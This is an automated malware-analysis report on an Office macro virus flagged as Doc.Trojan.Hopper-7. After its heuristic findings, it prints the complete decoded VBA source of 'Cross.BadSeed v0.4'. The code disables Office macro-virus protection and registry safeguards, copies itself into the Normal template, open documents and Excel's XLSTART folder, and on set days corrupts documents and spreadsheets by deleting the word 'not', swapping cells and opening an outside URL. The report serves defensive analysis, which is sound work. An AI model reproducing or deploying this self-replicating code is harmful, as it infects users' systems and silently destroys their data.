Verdict: MALICIOUS
Risk Score: 322
Heuristics: 7
- ClamAV: Doc.Trojan.Hopper-7 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Hopper-7
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: Set xlApp = CreateObject("Excel.Application")
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: Set WordObj = GetObject(, "Word.Application")
- VBA copies the workbook into the Excel XLSTART startup folder (high, OLE_VBA_XLSTART_PERSISTENCE): The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour. Matched line in script: xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6397 bytes |

SHA-256: fcfe587336906b8f0ee1adc7151fc22f3ee65937d733730af42b6d04827ea4f0
Detection: ClamAV: Doc.Trojan.Hopper-7
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.4 /1nternal
Private InRoutine As Boolean
Private Sub Document_Close()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
xlApp.Workbooks("Book1.").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
xlApp.Workbooks("Book1.").Close SaveChanges:=True
End If
xlApp.Application.Quit
End If
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
Select Case Day(Now)
Case 15 And (Int((10 * Rnd) + 1) = 1)
ActiveDocument.FollowHyperlink Address:="http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm", NewWindow:=True, AddHistory:=False
Case 1 And (Int((10 * Rnd) + 1) = 1)
For i = 1 To ActiveDocument.Characters.Count
If ActiveDocument.Characters(i).Text = "I" Then ActiveDocument.Characters(i).Text = "1"
Next
Case 5 And (Int((10 * Rnd) + 1) = 1)
For i = 1 To ActiveDocument.Words.Count
If ActiveDocument.Words(i).Text = "not" Then ActiveDocument.Words(i).Text = ""
Next
Case 10 And (Int((15 * Rnd) + 1) = 1)
With Assistant.NewBalloon
.Heading = "Cross.BadSeed v0.4"
.Text = "Programmer: 1nternal" + Chr(13) + "Class Infection: VicodenES" + Chr(13) + "ActiveX Concept: 1nternal" + Chr(13) + "Book1. Concept: VicodenES" + Chr(13) + Chr(13) + "1nternal also wishes to thank all contributors and supporters which have made Cross.BadSeed possible."
.Show
End With
Case 20 And (Int((5 * Rnd) + 1) = 1)
Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
End Select
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
InRoutine = True
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
Set NT = Nothing
If Quit = True Then WordObj.Application.Quit
Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Workbooks("Book1.").Close SaveChanges:=True
End If
For i = 1 To Workbooks.Count
If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
Next
If ActiveWorkbook.Name <> "Book1." Then
Select Case Day(Now)
Case 1 And Int((Rnd * 10) + 1) = 1
For i = 1 To 10
ActiveSheet.Cells(Int(Rnd * 100), Int(Rnd * 100)).AddComment "Cross.BadSeed v0.4"
Next
Case 10 And Int((Rnd * 3) + 1) = 1
For f = 1 To 5
CellCol = Int(Rnd * 15) + 2
For i = 1 To 30
Row1 = Int(Rnd * 200) + 10
Row2 = Int(Rnd * 200) + 10
TempVal = ActiveSheet.Cells(Row1, CellCol)
ActiveSheet.Cells(Row1, CellCol) = ActiveSheet.Cells(Row2, CellCol)
ActiveSheet.Cells(Row2, CellCol) = TempVal
Next
Next
Case 15
Author = "1nternal"
Case 20 And Int((Rnd * 5) + 1) = 1
Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
End Select
End If
End Sub
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True